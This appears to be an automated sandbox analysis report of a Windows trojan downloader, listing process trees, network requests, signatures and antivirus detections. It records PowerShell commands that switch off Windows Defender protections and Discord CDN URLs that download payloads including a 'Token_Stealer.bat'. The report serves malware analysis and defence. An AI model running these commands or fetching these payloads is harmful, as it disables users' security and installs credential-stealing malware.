Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | March 22, 2021, 10:19 a.m. | March 22, 2021, 10:23 a.m. |
-
-
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
8704 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
3360 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
5256 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
8772 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
2600 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
3980 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
3632 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
7352 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
3716 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
4640 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
1616
-
-
-
Machos1.exe "C:\Windows\Machos1.exe"
6692
-
Name | Response | Post-Analysis Lookup |
---|---|---|
raw.githubusercontent.com | 185.199.108.133 | |
cdn.discordapp.com | 162.159.130.233 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49806 162.159.129.233:443 |
None | None | None |
TLSv1 192.168.56.102:49805 162.159.129.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.102:49807 162.159.129.233:443 |
None | None | None |
TLSv1 192.168.56.102:49827 162.159.129.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
section | .itext |
section | .didata |
section | .debug |
packer | BobSoft Mini Delphi -> BoB / BobSoft |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://cdn.discordapp.com/attachments/790590543397781576/821075940146282537/Token_Stealer.bat |
request | GET https://cdn.discordapp.com/attachments/790590543397781576/816661031254229033/Disable.vbs |
request | GET https://cdn.discordapp.com/attachments/790590543397781576/821076672370573422/Machos1.exe |
request | GET https://cdn.discordapp.com/attachments/790590543397781576/820879760904683561/System.exe |
request | GET https://cdn.discordapp.com/attachments/790590543397781576/821075940146282537/Token_Stealer.bat |
file | C:\Windows\System.exe |
file | C:\Windows\Disable.vbs |
file | C:\temp\finalres.bat |
file | C:\Windows\Machos1.exe |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell Set-MpPreference -ModerateThreatDefaultAction 6 |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2 |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0 |
cmdline | powershell Set-MpPreference -SubmitSamplesConsent 2 |
cmdline | powershell Set-MpPreference -DisableBehaviorMonitoring $true |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6 |
cmdline | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true |
cmdline | powershell Set-MpPreference -HighThreatDefaultAction 6 -Force |
cmdline | powershell Set-MpPreference -DisableBlockAtFirstSeen $true |
cmdline | powershell Set-MpPreference -LowThreatDefaultAction 6 |
cmdline | powershell Set-MpPreference -DisableScriptScanning $true |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true |
cmdline | powershell Set-MpPreference -SevereThreatDefaultAction 6 |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true |
cmdline | powershell Set-MpPreference -DisableIOAVProtection $true |
cmdline | powershell Set-MpPreference -MAPSReporting 0 |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6 |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6 |
file | C:\Windows\Disable.vbs |
file | C:\Windows\Machos1.exe |
description | Affect system registries | rule | win_registry | ||||||
description | Affect system token | rule | win_token | ||||||
description | Affect private profile | rule | win_private_profile | ||||||
description | Affect private profile | rule | win_files_operation | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
host | 172.217.25.14 |
parent_process | wscript.exe | martian_process | C:\Windows\SysWOW64\wscript.exe "C:\Windows\Disable.vbs" /elevate | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\SysWOW64\WScript.exe" "C:\Windows\Disable.vbs" /elevate | ||||||
parent_process | wscript.exe | martian_process | powershell Set-MpPreference -ModerateThreatDefaultAction 6 | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2 | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0 | ||||||
parent_process | wscript.exe | martian_process | powershell Set-MpPreference -SubmitSamplesConsent 2 | ||||||
parent_process | wscript.exe | martian_process | powershell Set-MpPreference -DisableBehaviorMonitoring $true | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6 | ||||||
parent_process | wscript.exe | martian_process | powershell Set-MpPreference -DisableRealtimeMonitoring $true | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true | ||||||
parent_process | wscript.exe | martian_process | powershell Set-MpPreference -HighThreatDefaultAction 6 -Force | ||||||
parent_process | wscript.exe | martian_process | powershell Set-MpPreference -DisableBlockAtFirstSeen $true | ||||||
parent_process | wscript.exe | martian_process | powershell Set-MpPreference -LowThreatDefaultAction 6 | ||||||
parent_process | wscript.exe | martian_process | powershell Set-MpPreference -DisableScriptScanning $true | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true | ||||||
parent_process | wscript.exe | martian_process | powershell Set-MpPreference -SevereThreatDefaultAction 6 | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true | ||||||
parent_process | wscript.exe | martian_process | powershell Set-MpPreference -DisableIOAVProtection $true | ||||||
parent_process | wscript.exe | martian_process | powershell Set-MpPreference -MAPSReporting 0 | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6 | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6 |
file | 85f1898ca67d99c1_finalres.bat |
MicroWorld-eScan | Trojan.GenericKD.36553863 |
McAfee | Artemis!897AABD3AC16 |
Cylance | Unsafe |
Alibaba | TrojanDownloader:Win32/ATRAPS.b39c39f8 |
BitDefenderTheta | Gen:NN.ZelphiF.34628.@Z0@aGIITDli |
APEX | Malicious |
Paloalto | generic.ml |
Kaspersky | HEUR:Trojan-Downloader.Win32.Generic |
BitDefender | Trojan.GenericKD.36553863 |
Avast | Win32:Malware-gen |
Rising | Downloader.Generic!8.141 (CLOUD) |
Ad-Aware | Trojan.GenericKD.36553863 |
Emsisoft | Trojan.GenericKD.36553863 (B) |
DrWeb | Trojan.DownLoader38.3828 |
McAfee-GW-Edition | BehavesLike.Win32.Generic.rm |
FireEye | Generic.mg.897aabd3ac16050d |
SentinelOne | Static AI - Suspicious PE |
GData | Trojan.GenericKD.36553863 |
Avira | TR/ATRAPS.Gen |
AegisLab | Trojan.Win32.Generic.a!c |
Microsoft | Trojan:Win32/Wacatac.B!ml |
Cynet | Malicious (score: 85) |
MAX | malware (ai score=84) |
VBA32 | Trojan.Wacatac |
Ikarus | Trojan.Agent |
Fortinet | W32/Generic!tr.dldr |
AVG | Win32:Malware-gen |
Qihoo-360 | Win32/TrojanDownloader.Generic.HwUBDDcA |
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |